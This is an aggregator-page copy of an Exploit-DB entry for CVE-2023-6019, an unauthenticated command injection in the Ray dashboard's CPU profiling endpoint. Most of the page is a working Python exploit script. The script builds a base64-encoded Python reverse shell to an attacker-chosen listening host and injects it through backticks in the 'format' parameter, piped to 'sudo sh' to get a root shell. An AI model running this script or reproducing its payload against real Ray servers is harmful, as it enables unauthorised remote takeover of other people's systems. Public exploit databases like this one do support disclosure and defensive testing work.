1

[webapps] Ray OS v2.6.3 - Command Injection RCE(Unauthorized)

 4 weeks ago
source link: https://www.exploit-db.com/exploits/51978
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

Ray OS v2.6.3 - Command Injection RCE(Unauthorized)

EDB-ID:

51978

EDB Verified:

Exploit:

  /  

Platform:

Python

Date:

2024-04-12

Vulnerable App:

# Exploit Title: Ray OS v2.6.3 - Command Injection RCE(Unauthorized)
# Description:
#  The Ray Project dashboard contains a CPU profiling page, and the format parameter is
#  not validated before being inserted into a system command executed in a shell, allowing
#  for arbitrary command execution. If the system is configured to allow passwordless sudo
#  (a setup some Ray configurations require) this will result in a root shell being returned
#  to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================

# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3

proxies = {"http": "127.0.0.1:8080"}
headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"
}


def check_url(target, port):
    target_url = target + ":" + port
    https = 0
    if 'http' not in target:
        try:
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            test_url = 'http://' + target_url
            response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
            if response.status_code != 200:
                is_https = 0
                return is_https
        except Exception as e:
            print("ERROR! The Exception is:" + format(e))
    if https == 1:
        return "https://" + target_url
    else:
        return "http://" + target_url


def exp(target,ip,lhost, lport):
    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
    print("[*]Payload is: " + payload)
    b64_payload = base64.b64encode(payload.encode())
    print("[*]Base64 encoding payload is: " + b64_payload.decode())
    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=`echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh`'
    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
    print(exp_url)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    response = requests.get(url=exp_url, headers=headers, verify=False)
    if response.status_code == 200:
        print("[-]ERROR: Exploit Failed,please check the payload.")
    else:
        print("[+]Exploit is finished,please check your machine!")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='''
         ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
        ⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄
        ⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃
        
        
        
                            ⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄
                            ⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄
        ⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀
        ⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
        ''',
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument('-t', '--target', type=str, required=True, help='tart ip')
    parser.add_argument('-p', '--port', type=str, default=80, required=False, help='tart host port')
    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
    parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
    args = parser.parse_args()
    # target = args.target
    ip = args.target
    # port = args.port
    # lhost = args.lhost
    # lport = args.lport
    targeturl = check_url(args.target, args.port)
    print(targeturl)
    print("[*] Checking in url: " + targeturl)
    exp(targeturl, ip, args.lhost, args.lport)

report

Recommend

About Joyk


Aggregate valuable and interesting links.
Joyk means Joy of geeK